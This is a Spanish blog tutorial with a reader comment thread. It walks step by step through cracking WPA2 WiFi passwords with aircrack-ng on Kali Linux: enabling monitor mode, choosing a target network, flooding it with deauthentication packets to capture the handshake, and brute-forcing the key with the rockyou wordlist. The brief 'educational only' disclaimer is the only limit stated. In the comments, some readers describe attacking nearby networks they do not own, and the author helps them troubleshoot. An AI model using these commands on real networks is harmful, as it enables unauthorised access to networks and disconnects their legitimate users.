Cracking Claves WiFi Aircrack-Ng
Cracking de Contraseñas WiFi con Aircrack-Ng

Pentesting de WiFi con Aircrack-Ng (Guía para principiantes)

¿Buscabas poner a prueba la seguridad de las contraseñas WiFi? En esta guía vamos a realizar pentesting de contraseña WiFi con Aircrack-ng.

Veremos un método clásico para cracking de la contraseña o clave de una red inalámbrica. Todas las herramientas utilizan este método de una manera u otra. Veamos cómo usar Aircrack-ng.

En este artículo de hacking nos centraremos en el uso de las herramientas de Kali Linux para probar la fuerza de las claves de redes inalámbricas (WiFi) al tratar de romper directamente la contraseña. ¿Por qué decimos cracking de contraseñas? porque el Password cracking es el proceso de recuperación de contraseñas.

Nota Importante

El siguiente tutorial es sólo para fines educativos. Utiliza esta herramienta bajo tu propio riesgo. Si nadie te hace daño no tienes por qué hacer daño.

En los últimos años, las redes WiFi han recorrido un largo camino y siempre que su red esté usando el cifrado WPA2-AES, una contraseña fuerte, y tiene el WPS deshabilitado será extremadamente difícil de acceder. Hey! vamos a intentarlo 😉

Un método para el hacking de contraseñas cifradas de Wi-Fi es mediante la fuerza bruta, por lo que cada combinación de caracteres se intenta hasta que llegue a la correcta. Es teóricamente posible, pero esto puede tomar años en la práctica, especialmente si se utiliza una contraseña larga.

Kali Linux incluye la suite de herramientas aircrack-ng, que puede ser utilizada por los hackers para acelerar este proceso considerablemente. Esto se hace generalmente intentando con una listas de palabras pre-compiladas que contienen contraseñas predeterminadas y comunes, así como forzando a los dispositivos a volver a autenticarse para que pueda capturar el procedimiento crucial: handshake, donde la clave del WiFi se intercambia con el router.

Pasos para Descifrar Contraseñas WiFi con Aircrack-Ng

Por supuesto para empezar se necesita tener una tarjeta inalámbrica. Además, contar con una distribución como Kali Linux. Una vez que tenga esto, empezamos a intentar “hackear” contraseñas WiFi.

Preparando el Adaptador

  • Compruebe que Kali puede detectar el adaptador abriendo la terminal y ejecutando el comando:
airmon-ng
  • Deshabilite cualquier proceso que pueda interferir con su captura de paquetes, escriba el siguiente comando:
airmon-ng check kill
  • Ahora ponga el adaptador en modo de monitoreo con el comando:
airmon-ng start wlan0
Kali WiFi airmon-ng
Comando airmon-ng
  • Anote el nombre de la interfaz y ejecute airodump-ng <nombre de la interfaz> para listar las redes que le rodean, por ejemplo:
//Ejecute el siguiente comando 
//para empezar a escuchar todas las conexiones WiFi disponibles
airodump-ng wlan0mon

Comprueba!

Ejecute el siguiente comando para confirmar que su adaptador WiFi está en modo monitor: ifconfig. Si visualiza a su adaptador WiFi como wlan0mon significa que adaptador está en modo monitor.

Encontrando la Red WiFi Objetivo

  • Encuentre en la lista, la red que tiene como objetivo descifrar su contraseña. Anote el “BSSID” y “CH” (Canal). Verá algo parecido a:
airodump-ng wlan0mon
Comando airodump-ng wlan0mon
  • A continuación, después de haber visto su objetivo presione las teclas Ctrl+C y ejecute el comando:
airodump-ng -c 6 –-bssid 02:08:22:7E:B7:6F --write EsGeeks wlan0mon
airodump-ng c bssid
Comando airodump-ng
 ParámetroDescripción
-c:Es número del canal de la red que aparece en la columna CH (En la salida de la pantalla anterior). En mi caso es 6.
–bssid:Es la dirección MAC de la red objetivo. En mi caso es EsGeeks y el BSSID es 02:08:22:7E:B7:6F
–write:Es el archivo de captura en la que se guardarán los paquetes. En mi caso la he nombrado como “EsGeeks”.
-w:Es el prefijo del nombre de archivo que contendrá el handshake
wlan0mon:La interfaz inalámbrica

No se trata de suerte

Airodump comenzará a capturar paquetes de datos y guardarlos en su archivo de registro. Cuantos más dispositivos utilicen la red inalámbrica, más datos se capturan.

Lanzando un ataque deauth

  • Ahora abrimos una nueva terminal e iniciamos el ataque deauth para desconectar todos los clientes conectados a la red. Ésto le ayudará en la captura del handshake. Ingrese el comando:
aireplay-ng -0 10 –a 02:08:22:7E:B7:6F  -e EsGeeks wlan0mon
 ParámetroDescripción
-0:Se utiliza para el ataque deauth.
10:Es el número de paquetes deauth para ser enviados.
-a:Es la dirección MAC de la red WiFi objetivo.
-e:Es el ESSID de la red objetivo, es decir, su nombre.
  • Después de lanzar el ataque deauth y conseguir el HANDSHAKE WPA, pulse Ctrl+C .
Clave WiFi aireplay-ng
Comando aireplay-ng

Descifrando Claves WiFi por Fuerza Bruta

  • Ahora tenemos que romper la clave con aircrack-ng, escriba el comando:
aircrack-ng EsGeeks-01.cap -w rockyou.txt
 ParámetroDescripción
EsGeeks-01.cap:Es el archivo de captura que generamos en el airodump-ng. (puede ejecutar el comando “ls” para mostrar el nombre exacto de su archivo de registro)
-w:Es el diccionario que se utilizará para llevar a cabo el ataque de fuerza bruta.

En mi caso, la clave se ha encontrado! Key Found!

Hacking Clave Wifi Descifrada
Contraseña WiFi Descifrada

Por supuesto, si la clave es del tipo de la imagen anterior, la herramienta la descifrará en un instante. Mientras más compleja sea la contraseña, mayor será el tiempo de dar con ella. ¿Cómo puedes acelerar el proceso? con un buen diccionario…

El craqueo de contraseñas requiere una lista de palabras. Puedes descargar uno o extraer el archivo rockyou.txt.gz que se encuentra en /usr/share/wordlists/ en Kali. Hay otra lista en la siguiente ruta: /usr/share/nmap/nselib/data/passwords.lst

Hasta aquí hemos visto cómo usar Aircrack-ng para el cracking de contraseñas WiFi. Si te ha gustado el artículo, por favor, compártelo 😉

Si tienes alguna duda, alguna experiencia o crees que me he equivocado en algún aspecto puedes comentarlo en la sección de abajo.

  1. quería hacer una pregunta, para que sirve el proceso que se hizo si se necesita un diccionario al final tendría uno que crearlo o con el proceso puesto se crea uno para su uso?

      1. Una pregunta a la hora de ejecutar el código pongo la lista solo me comprueba 2 contraseñas y luego me pone key not found y ya no busca más que hago?

      2. Hola buenas, seguí todos los pasos conseguí el handshake, mi pregunta es si mientras mas data tengo capturados antes de ejecutar el ataque varía en algo?

    1. lo que juan quiere decir es para que sacar el hanshake porque él cree que cuando se usa el diccionario la contraseña se lanza contra la autenticación del propio router.

      1. Alexynior que version de Kali Linux Utilizas,El wordList por defecto es el basico del 1-9, la mayoria de los routers son de caracteres entre 6 – 16 y algunos exigen dos MAYUS – Dos minus – Dos numericas – Dos caracteres especiales… 🙂 se deberia crear un WordList con estas exigencias en el tuto 🙂 jejej

      2. se que llego un poco tarde a esta pagina pero cuando pongo airmon-ng en la terminal me dice ejecutalo como root, como puedo hacer en estos casos?

      1. Hola una pregunta, la primera ves puede hackear la contraseña, después cambie la contraseña del routers intente hackear de nuevo y me sale la contraseña anterior

  2. Hola saludos!!
    Ya he realizado todos los pasos pero no encuentro el archivo rockyou.txt de donde lo puedo sacar?
    Intento con el passwords.lst pero me dice q formato no admitido….
    Gracias por tu ayuda.

      1. soy principiante, donde busco la terminal? o que programa abro. tengo windows 10. y trate con el cmd y poniendo los codigos pero me dice que no se puede. veo que tu los pones en un programa que se llama root@alexynior. dime. por favor

  3. Veamos tengo un problema, al ejecutar airmon-ng me aparece esto:

    root@kali:~# airmon-ng
    ls: cannot access ‘/sys/class/ieee80211/’: No such file or directory

    PHY Interface Driver Chipset

    que tengo que hacer?

    1. Hola Juan!

      ¿Lo estás ejecutando desde Linux mismo o desde una máquina virtual?

      Escribe ‘iwconfig’ en la terminal y comprueba que wlan0 se muestre o esté lista. Puede que tengas problema con el adaptador WiFi…

  4. Bien explicado … aunque te falta mucho por decir y alguien que no tiene idea sobre el tema no sabria como enfretar estos pasos.
    Ademas vi que dices que no siempre es efectivo…. ahi estas muy equivocado Juan porque es %100 efectivo en buenas manos.

  5. Una cosa que me queda en duda es, si segun el aircracck puede descifrar hasta 575.21 claves/segundo; no es muy lento? segun wifislax64.1-1 puede testear de 900k/s a 1000k/s y me parece lentisimo, pues tardaria muchos dias para sacarme una clave de 11 caracteres, verdad? he leído por ahí que aplicando el airolib-ng se puede lograr velocidades de 50,000 a 300,00k/s podrían hacer ese tutorial? sería un buen aporte… gracias!

    1. Hola! Gracias por comentar 😀

      Bien, usted tiene razón. airolib-ng, parte de la suite aircrack-ng, nos permite trabajar con la PKM (Pairwise Master Key). El PMK precalculado nos ahorra mucho tiempo llegando a velocidades que usted menciona.

      Voy a tratar de hacer ese tutorial tan pronto como pueda, gracias por la recomendación 🙂

    1. ¡Hola Christian!

      Bien, Kali es la nueva versión de Backtrack desarrollado por el mismo desarrollador (está basado en Debian y no en Ubuntu como lo estaba anteriormente). Como toda nueva versión recibe más soporte, más actualizaciones y por supuesto mejoras. Kali tiene nuevas herramientas y es una completa re-estructuración de backtrack por lo que es mejor 🙂

  6. Buenas, al darle airodump-ng wlan0mon me sale la interfaz para buscar bssids pero no me encuentra ninguna, me aseguro de tener wlan0 como monitor y todo esta en regla, pero al darle el comando no me busca ninguna por muchos 20 minutos que lo deje. ¿Cómo puedo hacer para que me ecuentre las redes? Gracias

    1. Hola Juaquín.

      Primero verifica si puedes ver redes haciendo clic en el icono del WiFi.

      A continuación, intenta ejecutar lo siguiente:

      apt-get dist-upgrade

      Luego,

      airmon-ng stop wlan0
      airmon-ng check kill
      airmon-ng start wlan0
      airodump-ng wlan0mon

      Avísame si se solucionó el problema…

  7. Buenas, el paso 1.4 no entiendo porque poner l extensión ( .cap) después de poner la interfaz, que sería eso? Y otra cosa, al poner -w y el diccionario, tengo que poner la ruta o solo el nombre del diccionario? Y de ser así tengo que guardarlo en un lugar específico para que me lo encuentre, es que el diccionario lo generé anteriormente y lo tengo en un pendrive.

  8. Buenas tardes amigo me podrías apoyar cuando estoy por terminar el proceso del vídeo y colocar el comando aireplay-ng y poder visualizar el handshake me dice que el canal es fijo y al escribir el comando ls noe aparece como en tu ejemplo de rockyou.txt me podrías ayudar porfa

  9. HOLA
    ES QUE TENGO UNA DUDA TENGO QUE TENER UN ADAPTADOR WIFI O SIRVE TENER EL ROUTER CONECTADO A MI PC AH Y TENGO UN PORTATIL Y HE HECHO LO IMPOSIBLE PARA QUE ME APAREZCA WIFI CONECTION Y BUSCAR LAS REDES HAY Y CONECTARME YA QUE PUES EL PORTATTIL TIENE SU RECEPTOR WIFI PERO NADA TE AGRADECERIA SI ME AYUDAS CON MI DUDA

    1. examina si tu version de kali linux esta bien instalada y si sigue asi busca en tu pc que tipo de tarjeta inalambrica tiene tu pc y tiene que tener la red inalambrica de tipo phy0 o phy1 si es otro tipo de tarjeta entonces no puedes escanear las redes

  10. Hola, espero estes bien, he seguido los pasos y todo bien hasta ahí, finalmente llegue hasta la parte de romper la clave y me dice que la clave no esta en el diccionario, resulta que esto lo he provado en mi propia red wifi y el diccionario contiene una sola palabra que es la contraseña de mi wifi, ¿ como puedo solucionar este problema ?

  11. Amigos

    Yo utilizo la version 18.04 Ubuntu (NO KALI) es posible que descarge de algun sitio diccionarios como rockyou.txt por ejemplo

  12. Hola Genio, muy bien explicado!!!. lo único que tengo dramas con el diccionario. Donde pones -w debería tener la ruta exacta de donde tengo el diccionario?. si es así que archivos del diccionario debo tener. o debo instalarlo? . Yo descargue el de github que mencionas arriba.

    Gracias.

  13. Oye amigo una pregunta hizo todo lo que tu hicistes y esta todo genial lo que pasa es que cuando quiero ya conseguir la contraseña espero todo el tiempo estimado y al final es como que no encuentra la contraseña en el diccionario rockyou.txt y en password.list osea no me encontro la contraseña al final de la red mi pregunta que otra cosa puedo hacer?

  14. Hola, espero podrían ayudarme y de ante mano gracias.

    Tengo el siguiente problema, al digitar el comando airmon-ng start wlan0 me da como resultado lo siguiente:

    PHY Interface Driver Chipset

    PD: segun el ejemplo debajo de PHY Interface Driver Chipset , debería salirme resultados de alguna interfaz pero no lo hace, creo que es porque no tengo la tarjeta de red bien configurada o algo así, he buscado pero no encuentro solución, si saben la respuesta agradezco me puedan ayudar. Gracias.

      1. Hola Alex, estaba esperando tu respuesta y gracias por responder.

        Tengo un sistema kali linux en una maquina virtual que uso, según investigando en Internet con el comando sudo lspci -nn puedo ver mi tarjeta de red en la parte donde dice Ethernet controller, según la información que sale ahí tengo una tarjeta de red Advanced micro devices inc.

      2. Saludos estoy usando un USB LIVE de Backtrack 5 REV 3 para esta version portable puedo ejecutar instalaciones de aplicaciones como por ejemplo un Google Chrome estable o una Mozilla Firefox mas actualizado que trae para asi poder navegar sin salir del entorno de trabajo de Back track 5. Y si conoce de buenos diccionarios para esta distribucion.

  15. Hola buenas, yo tengo la última versión de wifislax 2.0 final para windows 64x.

    Tengo varias capturas de handshake de redes wifi cercanas.

    Mi problema es que no me aclaro para desencriptarlas.

    He estoy probando el aircrack-ng 1.5.2 y lleva más de 1 hora tratando de encontrar la clave.

    Mi pregunta es :

    Me aparece en la pantalla Master key, transient key Y EAPOL HMAC ¿La clave de la red cual es?

  16. Hola una consulta, veras la clave que mostraste anteriormente es sólo numérico, como se hace para desencriptar una contraseña de números letras y símbolos por fuerza bruta teniendo en cuenta que dicha contraseña no está en el diccionario de kali linux, desde ya muchas gracias y éxitos.

  17. Hola, soy nuevo en esto. Pues hice un diccionario con crunch solo con las letras de mi contraseña un archivo de apena 60 mb, pues me encuentro algo extraño que no se pueda detectar la contraseña y lo lento q va, en 5 horas un 27%. Busque el diccionario y la contraseña está ahí, y es apenas de 8 letras… Otros métodos me pueden servir, y de q depende la velocidad, ahh después de espera y esperar me da error hablándome de comas jjjj tengo kali linux 2019.3

  18. Hola saludos excelente post he podido hacer todos los pasos y tuve que crear mi diccionario pues no tengo kali, uso una distro basada en Ubuntu, el punto es que la encriptación de la red que estoy probando es WEP pero aún así no logra hacer el handshake hay algún otro método más efectivo para el caso de esta red WEP ?

  19. Hola todo excelente gracias por el tutorial bien explicado pero al final no entendi si el archivo rockyou debe ser extraido en una caroeta especifica lo extraje en escritorio. Y ejecute. Marca que lee los paquetes habre el archivo.cap lee muchos paquetes ####

    1 potential target

    Y me pide espesificr diccionario con -w
    Y el archivo passwords lst marca error nosuch file or directory inclusonsi lo cambio a .txt me podrian apoyar con esto

  20. Hola buenas a todos tengo un problema: Ejecuto Kali Linux en windows en SUBSYSTEM y va todo genial pero veo tengo el mismo problema que elresto de personas. AIRMON-NG y el resultado es nada, me salen las columnas pero no sale nada en la tabla. Tengo un adaptador Atheros para hacer este tipo de cosas y aqui todavia no he logrado ponerlo como monitor para hacer la captura de paquetes. De momento no se como solucionarlo creo que hay algo que se me escapa.

    Gracias Atentamente

    PAPAITO JONS

  21. Buenas, ¿ lo que explicas se puede hacer booteando el kali desde una USB?
    cuando ingreso airmon-ng no me dice cual es el PHY ni la interface
    mi tarjeta wifi, creo, es Wireess Lan 802.22AC
    Gracias

  22. Hola excelente tutorial, ojalá lo hubiese encontrado antes 😅.
    Mí consulta es , ya tengo el handshake y cree unos diccionarios, ESTA parte en donde está comparando con el diccionario es offline? o se sigue necesitando monitorear la red objetivo

  23. Hola, tengo Ubuntu 20.04 y consigo hacer todos los pasos, menos el último, ya que me pide definir un diccionario -w, porque no me acepta cuando digito en la terminal rockyou.txt. ¿Sabes qué diccionario tengo poner en mi caso? Muchas gracias y saludos!

    1. Hola Julio,

      *Primero, si estás en máquina virtual necesitarás una adaptador extra.

      Usa el siguiente comando:

      ifconfig (el nombre de tu adaptador wifi) down. Como el mío es wlan0, el comando sería:

      • 1. ifconfig wlan0 down
      • 2. iwconfig wlan0 mode monitor

      Si el comando anterior devuelve un error de no hacer nada, simplemente compra un nuevo adaptador WiFi USB de estándar IEEE 802.11n, IEEE 802.11b, IEEE 802.11g

      1. gracias alex por tu respuesta,

        si esta en una maquina virtual, sin embargo lo tengo configurado para que vea la tarjeta wifi de mi pc.
        Probe los comandos que me digiste y no veo ningun error, sin embargo sigue sin detectar redes con airodump

        me dices que para que funcione seria con un adaptador externo?, de instalar kali en mi pc y no virtualizado seguiria siendo necesario adquirir el adaptado?

        muhas gracias!

  24. Hola buenas me preguntaba por qué pongo el comando airmon-ng en la terminal de Kali y me dice “orden no encontrada”? Gracias

  25. hola, al momento de ejecutar el comando de aircrack-ng ______.cap -w rockyou.txt, me salta esto:

    ERROR: Opening dictionary rockyou.txt failed (No such file or directory)

    pero ya tengo descomprimido el archivo en la carpeta de wordlists.
    espero puedas ayudarme, veo que la publicación es algo vieja, gracias.

    1. Hola, por supuesto…

      Debes especificar la ruta completa de tu archivo rockyou.txt. Primero comprueba que el archivo lo tienes. (también puedes navegar con el administrador de archivos y ubicar el archivo rockyou.txt, y luego arrastrarlo a la terminal cuando se te solicite)

  26. Hola buenas, seguí todos los pasos conseguí el handshake, mi pregunta es si mientras mas data tengo capturados antes de ejecutar el ataque varía en algo?

  27. yo tengo un comando para desautenticar usarios conectdos al wifi y asi capturan el handshake es este

    aireplay-ng -0 (aqui ponen el numero de beces que desean desconectar el dispositivo) -a (aqui ponen el bssid de la red) -c (ponen el station en el que esta el dispositivo)

    y asi capturan el handshake

  28. Gracias por tu tiempo y buena explicación. Tengo 2 router en casa y estoy intentando entrar en el segundo lo hago todo pero el problema es que no consigo que lea el archivo .txt que he creado con crunch y le he añadido la contraseña del segundo router pero no la lee. He probado en varios directorios y nada, desde dónde hago la instrucción hago ls y puedo ver tanto los .cap o el archivo .txt
    el comando es el siguiente: $ aircrack-ng movistar_8d88.cap -w diccionario.txt
    He probado también con root y lo mismo me sale el siguiente mensaje:
    Opening movistar_8d88-01.cap
    Opening movistar_8d88-02.cap
    Invalid packet capture length 0 – corrupted file?
    No valid WPA handshakes found
    Quitting aircrack-ng…

    El mensaje no me preocupa porque entiendo que no encuentra información ya que lo he tenido poco tiempo escuchando, y lo que pretendo es conseguirlo a través de que lea el diccionario.
    ¿ Que estoy haciendo mal?
    Gracias

  29. Hola! Me gustaría contactarme con vos para comentarte unas preguntas y aprender mejor sobre este tema. (Soy de lo más nuevo que no te imaginas en esto)

  30. Buenos dias, cuando introduzco el paso airodump- ng , me aparece lo siguiente:
    socket(PF_PACKET) failed: operation not permitted
    This program requires root privileges.

    Me podrías dar alguna ayuda de como “tomar el control” de esos privilegios.
    Gracias

  31. lei que hay paginas online donde envias el handshake y te decodifican la clave, que tan cierto sera eso? aparte unas cobran otras son gratis.

  32. muy buen explicado ya tenia conocimiento pero aprenderse esos comandos es un lio y si lo usas de vez en cuando pero seguí tus pasos y funciono a la primera…Claro como dices todo depende del diccionario y ya tenia uno creado aparte con patrones..

  33. hola me gustaria que me apoyaras lo estoy haciendo de dos maneras de terminales con la terminal wordlists (huinaque㉿ELITE)-[/usr/share/wordlists]
    └─$ aircrack-ng FARMACIA_2.4-01.cap -w /rockyou.txt.gz 1 ⨯

    ERROR: Opening dictionary /rockyou.txt.gz failed (No such file or directory)
    ERROR: Opening dictionary /rockyou.txt.gz failed (No such file or directory)
    Reading packets, please wait…
    Opening FARMACIA_2.4-01.cap
    Failed to open ‘FARMACIA_2.4-01.cap’ (2): No such file or directory
    Read 0 packets.

    No networks found, exiting.

    Quitting aircrack-ng…

    LA VERDAD NO SE COMO CORREGIR EL ERROR.

    2.- DE UNA VENTANA NORMAL

    (huinaque㉿ELITE)-[~]
    └─$ aircrack-ng FARMACIA_2.4-01.cap -w /Escritorio/rockyou.txt.gz
    ERROR: Opening dictionary /Escritorio/rockyou.txt.gz failed (No such file or directory)
    ERROR: Opening dictionary /Escritorio/rockyou.txt.gz failed (No such file or directory)
    Reading packets, please wait…
    Opening FARMACIA_2.4-01.cap
    Read 103734 packets.

    # BSSID ESSID Encryption

    1 E8:1B:69:CD:F1:9C FARMACIA_2.4 Unknown

    Choosing first network as target.

    Reading packets, please wait…
    Opening FARMACIA_2.4-01.cap
    Read 103734 packets.

    1 potential targets

    Please specify a dictionary (option -w).

    Apoyame cual de las dos ventanas es correcta y como puedo coregir el error.

    gracias

    1. Hola!

      Te recomiendo que ante cualquier error, puedes usar un traductor y leer lo que dice.
      (No such file or directory) -> Indica que no existe el archivo en ese directorio donde has ejecutado el comando.

  34. Hola, tengo una duda seguí los pasos y todo salió bien pero me pide especificar un diccionario,use el de la ruta (rockyou.txt) y me pide especificar el diccionario, ¿no lo reconoce que puedo hacer?
    Gracias

    1. Hola Mike, tienes que utilizar la ruta exacta. Puede variar entre distribuciones. Si ya tienes un diccionario puedes arrastrar y soltar en la ventana de la terminal y se mostrará su ubicación exacta.

      Un saludo,

  35. Hola, me aparece la siguiente línea
    (Packets contained EAPOL data; unable to process this AP.)
    después de ejecutar el comando para decifrar claves por fuerza bruta,¿Por qué me dice que el paquete no tiene datos?

  36. Por aquí en el año 2023 deseo hacer lo mismo, pero me sólo puedo llegar al paso 3: airodump-ng wlan0mon, se inicia el modo de monitoreo, pero no encuentra ninguna señal. Lo curioso es que en el entorno gráfico de la barra de tareas (Kali) sí escuchaba muchas señales antes de iniciar la línea de comandos. ¿Qué está pasando?

    1. Hola!

      Puedes consultar algunas de estas opciones:

      Asegúrate de que estás utilizando la interfaz de monitoreo correcta. Puedes verificar las interfaces disponibles usando el comando iwconfig. Si la interfaz no está en modo de monitoreo, puedes cambiarla con el comando airmon-ng start wlan0.

      Puede ayudar reiniciar el servicio Network Manager después de configurar la interfaz en modo de monitoreo. Puedes hacerlo con el comando service NetworkManager restart.

      * Si la antena de tu tarjeta de red inalámbrica es débil o está dañada, es posible que tengas dificultades para detectar señales. Intenta moverte a un área con una mejor señal.

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.

Mi Carro Close (×)

Tu carrito está vacío
Ver tienda